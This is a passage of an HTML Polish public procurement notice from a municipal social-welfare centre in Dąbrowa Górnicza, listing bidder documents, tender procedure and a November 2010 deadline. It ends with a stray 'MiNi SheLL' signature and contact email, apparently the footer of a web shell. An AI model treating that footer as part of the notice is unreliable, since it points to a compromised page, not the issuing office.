<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty (Załącznik Nr 1 do SIWZ).
2. Pełnomocnictwo do reprezentacji Wykonawcy. Jeżeli ustanowione jest pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w formie oryginału lub kopii poświadczonej przez notariusza.
3.  Zobowiązania innych podmiotów  do oddania  do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane tylko w przypadku, gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust 2b ustawy (Załącznik nr 7  jeżeli  dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej
ul. Skibińskiego 1 pok. nr 17
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2010 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej
ul. Skibińskiego 1 pok. nr 17
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.12.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com